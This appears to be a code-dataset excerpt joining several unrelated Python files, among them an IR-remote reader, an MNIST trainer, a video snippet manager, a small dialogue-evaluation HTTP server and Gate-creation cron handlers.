probably a pull request\n if response.history:\n entity['is_pull'] = entity['repo'] + ' #' + entity['number']\n entity['url'] = 'https://github.com/' + entity['repo'] + '/pull/' + entity['number']\n entity['repo_type'] = repo_type\n elif response.status_code == 200:\n entity['is_issue'] = entity['repo'] + ' #' + entity['number']\n entity['url'] = url\n entity['repo_type'] = repo_type\n\n continue\n\n logger.error(\"[gitter] UUID {} - Could not resolve issue with index {}\".format(uuid, i))\n\n def extract_mentions(self, mentioned):\n \"\"\"Enrich users mentioned in the message\"\"\"\n\n rich_mentions = []\n\n for usr in mentioned:\n if 'userId' in usr.keys():\n rich_mentions.append({'mentioned_username': usr['screenName'], 'mentioned_userId': usr['userId']})\n\n return rich_mentions\n\n","repo_name":"k----n/GrimoireGitter","sub_path":"grimoirelab_elk/enriched/gitter.py","file_name":"gitter.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"25907669265","text":"from datetime import datetime, time\nfrom calendar import isleap\n\n\ndays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n\ndef year(start: datetime, end: datetime, days):\n for i in range(start.year, end.year):\n if isleap(i):\n days -= 1\n return days\n\n\ndef count_days(year, month, day):\n count = (year - 1) * 365 + day\n for m in range(1, month):\n count += days[m]\n return count\n\n\nstart = datetime(*map(int, input().split(' ')))\nend = datetime(*map(int, input().split(' ')))\n\nd1 = count_days(start.year, start.month, start.day)\nd2 = count_days(end.year, end.month, end.day)\n\nt1 = time(start.hour, start.minute, start.second)\nt2 = time(end.hour, end.minute, end.second)\n
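# When the end clock time is earlier than the start clock time, the last
# calendar day is incomplete, so one full day is subtracted below; e.g.
# (illustrative) 2023-01-01 10:00 -> 2023-01-02 09:00 counts 0 full days.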
if t2 < t1:\n print(d2 - d1 - 1, (end - start).seconds)\nelse:\n print(d2 - d1, (end - start).seconds)\n","repo_name":"Gipnotyin/Yandex_contest_spring_2023","sub_path":"1 задача/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"17727720986","text":"import pigpio\r\nimport time\r\nimport traceback\r\n \r\nPinIn = 17\r\nbutton_dict = {\r\n 0x357e304fb: \"mute\",\r\n 0x357e308f7: \"volume_down\",\r\n 0x357e310ef: \"vudu\",\r\n 0x357e31ee1: \"arrow\",\r\n 0x357e32cd3: \"rewind\",\r\n 0x357e330cf: \"disney+\",\r\n 0x357e332cd: \"play/pause\",\r\n 0x357e346b9: \"moon\",\r\n 0x357e34ab5: \"netflix\",\r\n 0x357e354ab: \"ok\",\r\n 0x357e36699: \"back\",\r\n 0x357e37887: \"left\",\r\n 0x357e38679: \"star\",\r\n 0x357e39867: \"up\",\r\n 0x357e3aa55: \"fast_forward\",\r\n 0x357e3b24d: \"hulu\",\r\n 0x357e3b44b: \"right\",\r\n 0x357e3c03f: \"home\",\r\n 0x357e3cc33: \"down\",\r\n 0x357e3e817: \"power\",\r\n 0x357e3f00f: \"volume_up\",\r\n}\r\n\r\n#Sets up GPIO\r\npi = pigpio.pi()\r\npi.set_mode(PinIn, pigpio.INPUT)\r\n\r\n\r\n\r\n \r\n# def poll_sensor(): #Pulls data from sensor\r\n # num1s = 0 #Number of consecutive 1s\r\n # command = [] #Pulses and their timings\r\n # binary = 0b1 #Decoded binary command\r\n # previousValue = 0 #The previous pin state\r\n # value = GPIO.input(PinIn) #Current pin state\r\n \r\n # # Wait until pin is pulled low\r\n # value = 0\r\n # channel = GPIO.wait_for_edge(PinIn, GPIO.FALLING, timeout=100)\r\n \r\n # startTime = time.time() #Sets start time\r\n \r\n # while channel is not None:\r\n # channel = GPIO.wait_for_edge(PinIn, GPIO.BOTH, timeout=100)\r\n \r\n # if value != previousValue: #Waits until change in state occurs\r\n # now = time.time() #Records the current time\r\n # pulseLength = (now - startTime) * 1000000 #Calculate time in between pulses in microseconds\r\n # startTime = now #Resets the start time\r\n # command.append((previousValue, pulseLength)) #Adds pulse time to array (previous val acts as an alternating 1 / 0 to show whether time is the on time or off time)\r\n \r\n # #Reads values again\r\n # previousValue = value\r\n # value = GPIO.input(PinIn)\r\n \r\n # #Converts data to binary\r\n # print(len(command))\r\n # for (typ, tme) in command:\r\n # if typ == 1:\r\n # binary = binary << 1\r\n # # print(round(tme, 1))\r\n # if tme > 1000: #According to NEC protocol a gap of 1687.5 microseconds represents a logical 1 so over 1000 should make a big enough distinction\r\n # binary += 1\r\n \r\n # if binary.bit_length() > 34: #Sometimes the binary has two rogue characters on the end\r\n # binary = binary >> (binary.bit_length() - 34)\r\n \r\n # return binary\r\n \r\n \r\n # # Helper function to poll the IR receiver pin and return the code received as an int\r\n # def get_remote_code(self):\r\n # # Record pulses until the wait time elapses\r\n # code = 0\r\n # pulses = []\r\n # try:\r\n # while True:\r\n # pulses.append(self.gpio_events.get(True, self.wait_time))\r\n # # print(pulses)\r\n \r\n # except queue.Empty:\r\n # # If there were no pulses, just return and don't try and convert anything\r\n # if len(pulses) == 0:\r\n # return 0\r\n \r\n # print(len(pulses)) \r\n # # Convert the pulses to binary\r\n # for i in range(len(pulses) - 1):\r\n # # The low pulses are the only ones that matter in terms of decoding\r\n # if pulses[i][0] == 0:\r\n # code = code << 1\r\n # # Logical 1 -> 1687.5us, logical 0 -> 562.5us. So split the difference\r\n # if pulses[i][1] > 1125:\r\n # code += 1\r\n \r\n # if code.bit_length() > 34: # Sometimes the binary has two rogue characters on the end\r\n # code = code >> (code.bit_length() - 34)\r\n # return code\r\n \r\n \r\nlast_tick = 0\r\n \r\ndef cbf(gpio, level, tick):\r\n global last_tick\r\n print(gpio, level, tick - last_tick)\r\n last_tick = tick\r\n \r\n#Main program loop\r\ntry:\r\n cb1 = pi.callback(PinIn, pigpio.EITHER_EDGE, cbf)\r\n while True:\r\n # command = poll_sensor()\r\n # if command in button_dict:\r\n # print(button_dict[command])\r\n # elif command > 100:\r\n # print(\"Unknown:\", hex(command))\r\n \r\n # channel = pi.wait_for_edge(PinIn, pigpio.EITHER_EDGE, wait_timeout=1)\r\n # after = time.time()\r\n # print((after - before) * 1000000)\r\n # before = after\r\n pass\r\nexcept:\r\n print(traceback.format_exc())\r\nfinally:\r\n pi.stop()\r\n \r\n","repo_name":"jtoby9/window_simulator","sub_path":"remote/remote_test_5.py","file_name":"remote_test_5.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"19074649624","text":"from .configuration import *\nfrom .statistics import *\nfrom .data_helpers import *\n\ndef dataframes_from_config(config, histogram_or_empty='', histogram_index_or_none=None):\n\n default_normalizing_dataframes = [None, None]\n main_and_diff_distributions = [[], []]\n already_normalized = [[], []]\n settings = []\n has_bands = False\n\n # use axis labels as data column headers\n x_title = read_configuration_value(config, key='x_title', index=histogram_index_or_none)\n y_titles = read_configuration_subplot_values(config, key='y_title', defaults=['__no_default__', '__use_main__'], index=histogram_index_or_none)\n\n # condition will be used as legend title by tsplot\n condition = read_configuration_value(config, key='legend_title', default='')\n\n bin_style = read_configuration_value(config, key='bin_style', default='step')\n centered = bin_style == 'center'\n\n x_lim = read_configuration_value(config, key='x_lim', default=None, index=histogram_index_or_none)\n\n if read_configuration_value(config, key='err_estimator', default='asymmetric_hessian_error') == 'asymmetric_hessian_error':\n err_estimator = asymmetric_hessian_error\n else:\n err_estimator = standard_error\n\n data_path = read_configuration_value(config, key='data_path', default=\".\")\n\n config_distributions = read_configuration_value(config, key='distributions')\n\n for distribution in config_distributions:\n\n main_and_diff_normalized_dataframe_or_none, distribution_has_bands, \\\n main_and_diff_distributions_are_normalized = read_distribution(data_path,\n distribution,\n centered,\n condition,\n x_title,\n y_titles,\n x_lim,\n histogram_or_empty=histogram_or_empty,\n err_estimator=err_estimator,\n settings=settings,\n main_and_diff_distributions=main_and_diff_distributions,\n config_distributions=config_distributions)[1:]\n\n for i in range(2):\n if main_and_diff_normalized_dataframe_or_none[i] is not None:\n default_normalizing_dataframes[i] = main_and_diff_normalized_dataframe_or_none[i]\n already_normalized[i].append(main_and_diff_distributions_are_normalized[i])\n\n if distribution_has_bands:\n has_bands = distribution_has_bands\n
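# Bin-wise normalization: distributions that were not already normalized are
# divided by the most recent normalizing dataframe captured for that axis
# (index 0 = main panel, index 1 = diff/ratio panel).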
for i, default_normalizing_dataframe in enumerate(default_normalizing_dataframes):\n if default_normalizing_dataframe is not None:\n for distribution, is_already_normalized in zip(main_and_diff_distributions[i], already_normalized[i]):\n if not is_already_normalized:\n for df in distribution:\n df[y_titles[i]] /= default_normalizing_dataframe[y_titles[i]]\n\n for i in range(2):\n main_and_diff_distributions[i] = [pd.concat(dataframes) if len(dataframes) else None for dataframes in main_and_diff_distributions[i]]\n\n return main_and_diff_distributions[0], main_and_diff_distributions[1], settings, has_bands\n","repo_name":"ebothmann/heppyplot","sub_path":"heppyplot/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"73909491150","text":"import tensorflow as tf\nimport mnist\nimport numpy as np\nimport os\nimport math\n\nFLAGS = tf.app.flags.FLAGS\ntf.app.flags.DEFINE_integer('max_step', 10000, 'Number of steps to run trainer')\ntf.app.flags.DEFINE_string('train_dir', './train', 'Directory where to write event logs and checkpoint')\n\n\ndef evaluate(sess, top_k_op, training, examples):\n iter_per_epoch = int(math.ceil(examples / FLAGS.batch_size))\n # total_sample = iter_per_epoch * FLAGS.batch_size\n correct_predict = 0\n step = 0\n\n while step < iter_per_epoch:\n predict = sess.run(top_k_op, feed_dict={training: False})\n correct_predict += np.sum(predict)\n step += 1\n\n precision = correct_predict / examples\n return precision\n\n\ndef train():\n filenames = tf.placeholder(tf.string, [None])\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(mnist.parse_data)\n dataset = dataset.shuffle(buffer_size=50000)\n dataset = dataset.batch(FLAGS.batch_size)\n dataset = dataset.repeat()\n\n iterator = dataset.make_initializable_iterator()\n\n global_step = tf.train.get_or_create_global_step()\n images, labels = iterator.get_next()\n logits, pred = mnist.inference(images, training=True)\n loss = mnist.loss(logits, labels)\n train_op = mnist.train(loss, global_step)\n\n with tf.train.MonitoredTrainingSession(\n checkpoint_dir=FLAGS.train_dir,\n hooks=[tf.train.StopAtStepHook(last_step=FLAGS.max_step), tf.train.NanTensorHook(loss)],\n save_checkpoint_steps=100\n ) as mon_sess:\n mon_sess.run(iterator.initializer, feed_dict={filenames: ['train_img.tfrecords']})\n while not mon_sess.should_stop():\n _, train_loss, train_step, label = mon_sess.run([train_op, loss, global_step, labels])\n if train_step % 100 == 0:\n print('step: {}, loss: {}'.format(train_step, train_loss))\n\n\ndef train_and_validation():\n training_dataset = tf.data.TFRecordDataset(['./train_img.tfrecords'])\n validation_dataset = tf.data.TFRecordDataset(['./validation_img.tfrecords'])\n test_dataset = tf.data.TFRecordDataset(['./test_img.tfrecords'])\n\n training_dataset = training_dataset.map(mnist.parse_data)\n training_dataset = training_dataset.shuffle(50000).batch(FLAGS.batch_size).repeat()\n validation_dataset = validation_dataset.map(mnist.parse_data).batch(FLAGS.batch_size)\n test_dataset = test_dataset.map(mnist.parse_data).batch(FLAGS.batch_size)\n\n iterator = tf.data.Iterator.from_structure(output_types=training_dataset.output_types,\n output_shapes=training_dataset.output_shapes)\n\n training_init_op = iterator.make_initializer(training_dataset)\n validation_init_op = iterator.make_initializer(validation_dataset)\n test_init_op = iterator.make_initializer(test_dataset)\n images, labels = iterator.get_next()\n\n training = tf.placeholder(dtype=tf.bool)\n logits, pred = mnist.inference(images, training=training)\n loss = mnist.loss(logits, labels)\n top_k_op = tf.nn.in_top_k(logits, labels, 1)\n global_step = tf.train.get_or_create_global_step()\n train_op = mnist.train(loss, global_step)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(training_init_op)\n print('begin to train!')\n ckpt = os.path.join(FLAGS.train_dir, 'model.ckpt')\n train_step = 0\n while train_step < FLAGS.max_step:\n _, train_loss, step, label = sess.run([train_op, loss, global_step, labels], feed_dict={training: True})\n train_step += 1\n if train_step % 100 == 0:\n saver.save(sess, ckpt, train_step)\n if train_step % 1000 == 0:\n precision = evaluate(sess, top_k_op, training, mnist.TRAIN_EXAMPLES_NUM)\n print('step: {}, loss: {}, training precision: {}'.format(train_step, train_loss, precision))\n sess.run(validation_init_op)\n precision = evaluate(sess, top_k_op, training, mnist.VALIDATION_EXAMPLES_NUM)\n print('step: {}, loss: {}, validation precision: {}'.format(train_step, train_loss, precision))\n sess.run(training_init_op)\n sess.run(test_init_op)\n precision = evaluate(sess, top_k_op, training, mnist.TEST_EXAMPLES_NUM)\n print('finally test precision: {}'.format(precision))\n\n
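# NOTE: train_and_validation() relies on a reinitializable iterator
# (tf.data.Iterator.from_structure), so the same get_next() tensors can be
# re-pointed at the train/validation/test datasets by running the matching
# *_init_op before each evaluation pass.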
if __name__ == '__main__':\n if tf.gfile.Exists(FLAGS.train_dir):\n tf.gfile.DeleteRecursively(FLAGS.train_dir)\n tf.gfile.MakeDirs(FLAGS.train_dir)\n # train()\n train_and_validation()\n\n","repo_name":"buptlj/learn_tf","sub_path":"mnist_train_tfdata.py","file_name":"mnist_train_tfdata.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"83"}
{"seq_id":"74958894672","text":"#!/usr/bin/env python3\nfrom SnippetGenerator import SnippetGenerator as snpg\nimport SnippetGenerator\n# import datetime\nfrom datetime import timedelta, datetime\nimport logging\nimport argparse\nimport multiprocessing as mp\nfrom skaimsginterface.skaimessages import *\nfrom skaimsginterface.tcp import MultiportTcpListenerMP, TcpSenderMP\nfrom pathlib import Path\n\n\nclass SnippetManager:\n logger = logging.getLogger(__name__)\n error_logger = logging.getLogger(f'{__name__}_errors')\n camfolder_day_format = '%Y-%m-%d'\n\n def __init__(self, print_q) -> None:\n self.stop_event = mp.Event()\n self.print_q = print_q\n self.msg_q = mp.Queue()\n\n # start handler process\n self.start_handler()\n\n # start listener process\n self.ports = [7201]\n self.listener = MultiportTcpListenerMP(portlist=self.ports,\n multiport_callback_func=self.multiport_callback,\n print_q=self.print_q,\n recordfile=None,\n verbose=True)\n\n def start_handler(self):\n self.handle_proc = mp.Process(name=f'snip_mgr_em_msg_handler',\n target=self.handle_em_msgs,\n args=(\n self.stop_event,\n self.print_q,\n self.msg_q,\n ))\n self.handle_proc.daemon = True\n self.handle_proc.start()\n\n def stop(self):\n self.stop_event.set()\n self.listener.stop()\n\n @staticmethod\n def handle_em_msgs(stop_event, print_q, msg_q):\n ten_sec = timedelta(seconds=10)\n five_sec = timedelta(seconds=5) # matches its name and the 5 s shift applied below\n logger = SnippetManager.logger\n error_logger = SnippetManager.error_logger\n while not stop_event.is_set():\n try:\n if not msg_q.empty():\n msg = msg_q.get_nowait()\n\n # continue if no camera time ranges in msg\n if len(msg.camera_time_ranges) == 0:\n printmsg = f'got msg type {msg.event} with cam time ranges list empty! not processing...'\n logger.debug(printmsg)\n error_logger.debug(printmsg)\n continue\n\n # output folder naming (event primary_obj.global_id event_starttime event_endtime)\n event_start_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(msg.event_starttime)\n event_end_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(msg.event_starttime) # note: also uses event_starttime, so start == end here\n date_str = event_start_time_dt.strftime('%Y-%m-%d')\n event_start_time_str = event_start_time_dt.strftime('%H-%M-%S')\n event_end_time_str = event_end_time_dt.strftime('%H-%M-%S')\n output_folder = f\"/snippets/{date_str}/E{msg.event}/ID{msg.primary_obj.global_id}/T{event_start_time_str}_T{event_end_time_str}_UTC\"\n\n # create output folder exist ok\n Path(output_folder).mkdir(parents=True, exist_ok=True)\n\n # input folder path based on day from event_start_time_dt (UTC time)\n day_folder = event_start_time_dt.strftime(SnippetManager.camfolder_day_format)\n cam_folder_path = f'/skaivideos/{day_folder}'\n\n # each task is SnippetGenerator.Task(cam_folder, start_time, end_time, output_file, TimeRangeBBoxes)\n tasks = []\n camera_mac_strings = []\n for ctr in msg.camera_time_ranges:\n if ctr.camera_id is None:\n printmsg = f'got missing camera id!'\n logger.exception(printmsg)\n error_logger.exception(printmsg)\n continue\n mac_hex_str = SkaiMsg.convert_camera_id_to_mac_addr_string(ctr.camera_id).upper()\n mac_hex_str_no_colon = mac_hex_str.replace(':', '')\n camera_mac_strings.append(mac_hex_str)\n\n # convert ctr times to utc datetime objects\n start_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(ctr.start_timestamp)\n end_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(ctr.end_timestamp)\n\n # TODO: compare bbox timestamps to see if they're in range?\n\n # check if duration is < 10 sec. if so move the start time back 5 sec\n duration = (end_time_dt - start_time_dt)\n if duration < ten_sec:\n start_time_dt = start_time_dt - five_sec\n\n # check if end time N sec of current time. if so delay N sec\n N = 15\n X = 10\n current_dt_utc = snpg.get_current_utc_datetime()\n cur_minus_X = current_dt_utc - timedelta(seconds=X)\n if end_time_dt > cur_minus_X:\n logger.info(f'got msg with end time {end_time_dt} > cur_t - 3 ({cur_minus_X}). delaying {N} seconds')\n time.sleep(N)\n\n # form strings for output file\n date_str = start_time_dt.strftime('%Y-%m-%d')\n start_time_str = start_time_dt.strftime('%H-%M-%S')\n end_time_str = end_time_dt.strftime('%H-%M-%S')\n\n cam_folder = f\"{cam_folder_path}/{mac_hex_str_no_colon}\"\n if Path(cam_folder).is_dir():\n output_file = f\"{output_folder}/{mac_hex_str_no_colon}_{date_str}_T{start_time_str}_T{end_time_str}_UTC.mp4\"\n # tasks.append([cam_folder, start_time_dt, end_time_dt, output_file])\n tasks.append(\n snpg.Task(cam_folder, start_time_dt, end_time_dt, output_file, ctr.tr_boxes))\n else:\n error_logger.exception(\n f'Not able to find folder {cam_folder}!!! not generating snippet for that cam')\n\n logger.info(\n f'got msg event: {msg.event} for cameras {camera_mac_strings} from {event_start_time_dt} to {event_end_time_dt}'\n )\n logger.info(f'tasks: {len(tasks)}')\n\n # for cam_folder, start_time, end_time, output_file in tasks:\n # logger.info(f'generating snippet for {cam_folder} {start_time} {end_time} {output_file}')\n # snpg.generate_snippet_for_cam(cam_folder, start_time, end_time, output_file)\n # logger.info('done')\n for t in tasks:\n logger.info(f'generating snippet for {t}')\n snpg.process_task(t)\n logger.info('done')\n except Exception as e:\n logger.exception(e)\n error_logger.exception(e)\n\n def multiport_callback(self, data, server_address):\n try:\n msg_type, msg = SkaiMsg.unpack(data)\n if msg_type == SkaiMsg.MsgType.SKAI_EVENT:\n self.msg_q.put_nowait(msg)\n except Exception as e:\n logger.exception(e)\n\n\nif __name__ == '__main__':\n #### argparse config ####\n parser = argparse.ArgumentParser()\n # parser.add_argument()\n args = parser.parse_args()\n\n #### logger config ####\n # lowest_log_level = logging.INFO\n lowest_log_level = logging.DEBUG\n\n # setup loggers for command line output and file output\n logger = logging.getLogger(__name__)\n logger.setLevel(lowest_log_level)\n\n error_logger = logging.getLogger(f'{__name__}_errors')\n error_logger.setLevel(logging.DEBUG)\n\n sg_logger = logging.getLogger(SnippetGenerator.__name__)\n sg_logger.setLevel(lowest_log_level)\n\n sg_error_logger = logging.getLogger(f'{SnippetGenerator.__name__}_errors')\n sg_error_logger.setLevel(lowest_log_level)\n\n # setup same format and file handler for both main and SnippetManager loggers\n log_format = logging.Formatter('%(asctime)s [%(levelname)8s] %(message)s')\n\n # file logging config\n fh = logging.FileHandler('/skailogs/snpm.log', mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(log_format)\n\n error_fh = logging.FileHandler('/skailogs/snpm_errors.log', mode='w')\n error_fh.setLevel(logging.DEBUG)\n error_fh.setFormatter(log_format)\n\n # stdout logging config\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(log_format)\n\n # attach handlers\n logger.addHandler(fh)\n logger.addHandler(ch)\n error_logger.addHandler(error_fh)\n error_logger.addHandler(ch)\n sg_logger.addHandler(fh)\n sg_logger.addHandler(ch)\n sg_error_logger.addHandler(error_fh)\n sg_error_logger.addHandler(ch)\n\n # init messages\n logger.info('==== Snippet Manager Logger Started ====')\n error_logger.info('==== Snippet Manager Error Logger Started ====')\n sg_logger.info('==== Snippet Generator Logger Started ====')\n\n #### Snippet Manager setup ####\n print_q = mp.Queue()\n snp_mgr = SnippetManager(print_q)\n logger.info('Snippet Manager started!')\n\n #### stay active until ctrl+c input ####\n try:\n while True:\n if not print_q.empty():\n logger.info(print_q.get_nowait())\n time.sleep(0.0000001)\n except KeyboardInterrupt:\n logger.info('snippet manager got keyboard interrupt!')\n finally:\n logger.info('stopping snippet manager...')\n snp_mgr.stop()","repo_name":"pwolfeGTRI/snippet_manager","sub_path":"ContainerCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"45136598884","text":"import sys\nimport time\nimport math\nimport re\nimport difflib\nimport collections\nimport json\nimport random\n\nfrom datetime import datetime\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import parse_qs, urlparse\nfrom page import *\n\nfrom pathlib import Path\n\n\ndef start():\n\n class MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n normal_paths = {\n '/': {'status': 200},\n '/favicon.ico': {'status': 202}, # Need for chrome\n }\n que_path = '/?page='\n if not self.path.startswith(que_path) and not self.path in normal_paths:\n response = 500\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n elif self.path in normal_paths:\n response = normal_paths[self.path]['status']\n print('path = {}'.format(self.path))\n\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n else:\n response = 200\n print('path = {}'.format(self.path))\n\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n def do_POST(self):\n \"\"\"\n Handle POST request, especially replying to a chat message.\n \"\"\"\n print('path = {}'.format(self.path))\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n if self.path == '/start':\n content_length = int(self.headers['content-length'])\n try:\n content = self.rfile.read(content_length).decode('utf-8')\n print('body = {}'.format(content))\n\n body = json.loads(content)\n\n did = body[\"id\"]\n with open(f\"../data/{did}.json\", \"r\") as t:\n dialogues = json.loads(t.read())\n\n response = dialogues\n except Exception as e:\n print(\"error\", e, flush=True)\n response = {\"text\": f\"server error!!! 入力形式に誤りがあります。error Message: {e}\"}\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n json_str = json.dumps(response)\n self.wfile.write(bytes(json_str, 'utf-8'))\n\n elif self.path == '/end':\n content_length = int(self.headers['content-length'])\n try:\n content = self.rfile.read(content_length).decode('utf-8')\n print('body = {}'.format(content))\n\n body = json.loads(content)\n\n uname = body[\"name\"]\n did = body[\"id\"]\n Path(f\"../log/{did}\").mkdir(parents=True, exist_ok=True)\n with open(f\"../log/{did}/{uname}.json\", \"w\") as t:\n print(body, file=t) # NOTE: writes the dict's Python repr, not strict JSON\n\n model_response = {\"text\": \"ok\"}\n except Exception as e:\n print(\"error\", e, flush=True)\n model_response = {\"text\": f\"server error!!! 入力形式に誤りがあります。error Message: {e}\"}\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n json_str = json.dumps(model_response)\n self.wfile.write(bytes(json_str, 'utf-8'))\n\n\n print(\"Start\", flush=True)\n address = ('localhost', 8080)\n\n MyHTTPRequestHandler.protocol_version = 'HTTP/1.0'\n with HTTPServer(address, MyHTTPRequestHandler) as server:\n server.serve_forever()\n\n\ndef main():\n start()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"horiso0921/vsEvalPlatform","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"35242114613","text":"#!/usr/bin/env python3\n\nimport os\nimport logging\nimport time\nfrom defs import run_with_locker, get_logger, load_data, ssh_run\n\nbasepath = os.path.realpath(__file__)[:-3]\nlogfile = basepath + '.log'\nlockfile = basepath + '.lock'\n\n@run_with_locker(lockfile)\ndef run():\n logger = get_logger(logfile, 'sanscript.fc')\n\n connections = []\n dirpath = os.path.dirname(os.path.realpath(__file__))\n for filename in ['FabricConnection.json', 'SwitchConnection.json']:\n filepath = os.path.join(dirpath, filename)\n connections += load_data(filepath, [])\n\n for connection in connections:\n args = [connection[key] for key in ['name', 'address', 'username', 'password']]\n args.append([])\n system, outs, errs, exception = ssh_run(args)\n if exception:\n logger.warning('%s test failed - %s' %(system, exception))\n else:\n logger.info('%s test success' %system)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"tulsluper/sanscript","sub_path":"apps/fc/scripts/test_connections.py","file_name":"test_connections.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"8101063547","text":"import collections\nimport logging\nfrom google.cloud import ndb # type: ignore\n\nfrom framework.basehandlers import FlaskHandler\nfrom internals import approval_defs\nfrom internals.core_models import FeatureEntry, Stage\nfrom internals.review_models import Gate\nfrom internals.core_enums import *\n\n\nclass EvaluateGateStatus(FlaskHandler):\n\n def get_template_data(self, **kwargs):\n \"\"\"Evaluate all existing Gate entities and set correct state.\"\"\"\n self.require_cron_header()\n\n gates: ndb.Query = Gate.query()\n count = 0\n batch = []\n BATCH_SIZE = 100\n for gate in gates:\n if approval_defs.update_gate_approval_state(gate):\n batch.append(gate)\n count += 1\n if len(batch) > BATCH_SIZE:\n ndb.put_multi(batch)\n batch = []\n\n ndb.put_multi(batch)\n return f'{count} Gate entities updated.'\n\n
class WriteMissingGates(FlaskHandler):\n\n GATES_TO_CREATE_PER_RUN = 5000\n\n GATE_RULES: dict[int, dict[int, list[int]]] = {\n fe_type: dict(stages_and_gates)\n for fe_type, stages_and_gates in STAGES_AND_GATES_BY_FEATURE_TYPE.items()\n }\n\n def make_needed_gates(self, fe, stage, existing_gates):\n \"\"\"Instantiate and return any needed gates for the given stage.\"\"\"\n if not fe:\n logging.info(f'Stage {stage.key.integer_id()} has no feature entry')\n return []\n if fe.feature_type not in self.GATE_RULES:\n logging.info(f'Skipping stage of bad feature {fe.key.integer_id()}')\n return []\n if stage.stage_type not in self.GATE_RULES[fe.feature_type]:\n logging.info(f'Skipping bad stage {stage.key.integer_id()} ')\n return []\n\n new_gates: list[Gate] = []\n needed_gates = self.GATE_RULES[fe.feature_type][stage.stage_type]\n for needed_gate_type in needed_gates:\n if not any(eg for eg in existing_gates\n if eg.gate_type == needed_gate_type):\n gate = Gate(\n feature_id=stage.feature_id,\n stage_id=stage.key.integer_id(),\n gate_type=needed_gate_type,\n state=Gate.PREPARING)\n new_gates.append(gate)\n return new_gates\n\n def get_template_data(self, **kwargs):\n \"\"\"Create a chunk of needed gates for all features.\"\"\"\n self.require_cron_header()\n\n all_feature_entries = FeatureEntry.query().fetch()\n fe_by_id = {fe.key.integer_id(): fe\n for fe in all_feature_entries}\n existing_gates_by_stage_id = collections.defaultdict(list)\n for gate in Gate.query():\n existing_gates_by_stage_id[gate.stage_id].append(gate)\n\n gates_to_write: list[Gate] = []\n for stage in Stage.query():\n new_gates = self.make_needed_gates(\n fe_by_id.get(stage.feature_id), stage,\n existing_gates_by_stage_id[stage.key.integer_id()])\n gates_to_write.extend(new_gates)\n if len(gates_to_write) > self.GATES_TO_CREATE_PER_RUN:\n break # Stop early if we risk exceeding GAE timeout.\n
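# Persist this run's chunk in one batch write; stages skipped by the
# early break above are picked up by a later cron run.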
